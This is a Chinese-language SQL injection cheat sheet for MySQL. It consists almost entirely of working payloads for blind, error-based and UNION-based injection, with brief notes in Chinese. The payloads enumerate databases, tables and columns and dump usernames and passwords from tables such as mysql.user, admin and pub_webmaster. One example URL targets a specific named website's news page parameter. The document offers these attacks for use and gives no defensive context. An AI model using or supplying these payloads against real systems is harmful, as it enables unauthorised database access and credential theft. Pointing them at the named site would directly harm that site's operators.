盲注查询:



and (select count(*) from mysql.user)>0/*   查看权限


1:system_user() 系统用户名

2:user()        用户名

3:current_user  当前用户名

4:session_user()连接数据库的用户名

5:database()    数据库名

6:version()     MYSQL数据库版本

7:load_file()   MYSQL读取本地文件的函数

8:@@datadir     读取数据库路径

9:@@basedir    MYSQL 安装路径

10:@@version_compile_os   操作系统  Windows Server 2003,



############################################################################################################


查看用户和密码:


http://www.fly-er.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12+from+mysql.user


查看有多少列:select 。。。 from information_schema.SCHEMATA– 



查询当前用户:

Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)


Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r

and(0)*2))x+from+information_schema.tables+group+by+x)a)







用户 数据库名称 数据库版本: 


and+substring(@@version,1,1)=4


and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13/* 


有时加上“/*” 会报错,所以此时需要去掉“/*”



#########################################    暴库     ######################################################


and 1=2 union select 1,2,SCHEMA_NAME,4,5,6,7,8,9,10,11 from information_schema.SCHEMATA limit 1,1/*

其中“limit 1,1” 中前面的数字“1”可以增加来查看多个库 (有时加上“/*” 会报错,所以此时需要去掉“/*”)


暴所有库:

+and+1=2+union+select+1,2,3,concat(GROUP_CONCAT(DISTINCT+table_schema)),5,6,7,8+from+information_schema.columns



读出所有库:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA



and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“LIMIT 0,1” 此处的0可看多个库




爆当前数据库

and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1






查询当前数据库:

Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)


Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo

or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)








####################################################################################################################################################################################################################################################################################################################################


####################################      快速爆表     #####################################################


爆所有表

and+1=2+union+select+1,group_concat(distinct+table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()



爆所有表

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9,10,11,12+from+information_schema.tables+where+table_schema=0x666C6965725F6462617365 或者=( database() )也行


and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*

有时加上“/*” 会报错,所以此时需要去掉“/*”



+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.tables+where+table_schema=0x697266+order+by+table_schema+limit+0,1)t+limit+1--

注:“table_schema=0x697266” 为上面查到的库的hex值  且“limit+0,1)”中的0可一直增加查看多个表



and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x70726F64756374 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“table_schema”后面的 “limit 0,1”中的0可爆多个表




####################################################################################################################################################################################################################################################################################################################################


##############################################      快速暴字段      ########################################


and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8 from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*

limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个字段。


newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+column_name),8,9,10,11,12+from+information_schema.columns+where+table_name=0x7075625F7765626D6173746572



读出所有表字段:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)

*/ (97,100,109,105,110)为admin的ascii码 依次类推



and+1=2+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.columns+where+table_name=爆出来的表名的hex值+and+table_schema=数据库名的hex值+order+by+1+limit+0,1)t+limit+1--

注:其中“limit+0,1)”中的0可以一直增加来查看多个字段



and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x70726F64756374 and table_name=0x61646D696E limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“table_name”后面的“limit 0,1”可爆多个字段



####################################################################################################################################################################################################################################################################################################################################



#################################        查看字段内容:       #############################################


and+1=2+union+select+1,2,3,concat(md_pw),5,6,7,8,9,10,11,12,13+from+MemberData



newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+username,0x5f,userpwd),8,9,10,11,12+from+pub_webmaster





and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*



union select 1,group_concat(username,0x3a,password),3,4,5... from 表(或表的hex值)



and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,admin.username,0x27,0x7e) from admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1